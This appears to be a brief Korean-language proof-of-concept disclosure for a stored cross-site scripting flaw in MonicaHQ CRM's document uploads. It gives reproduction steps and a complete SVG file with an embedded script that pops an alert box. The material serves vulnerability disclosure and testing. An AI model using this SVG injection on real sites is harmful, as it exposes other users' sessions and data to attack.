
MonicaHQ CRM의 문서 관리에서 악성 SVG 파일 업로드를 통한 저장형 XSS 취약점의 개념 증명 익스플로잇으로, 크로스 사이트 스크립팅을 시연합니다.
계정 생성
연락처 생성
문서에서 악성 SVG 파일 업로드
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert("Monicahq XSS Poc");
</script>
</svg>
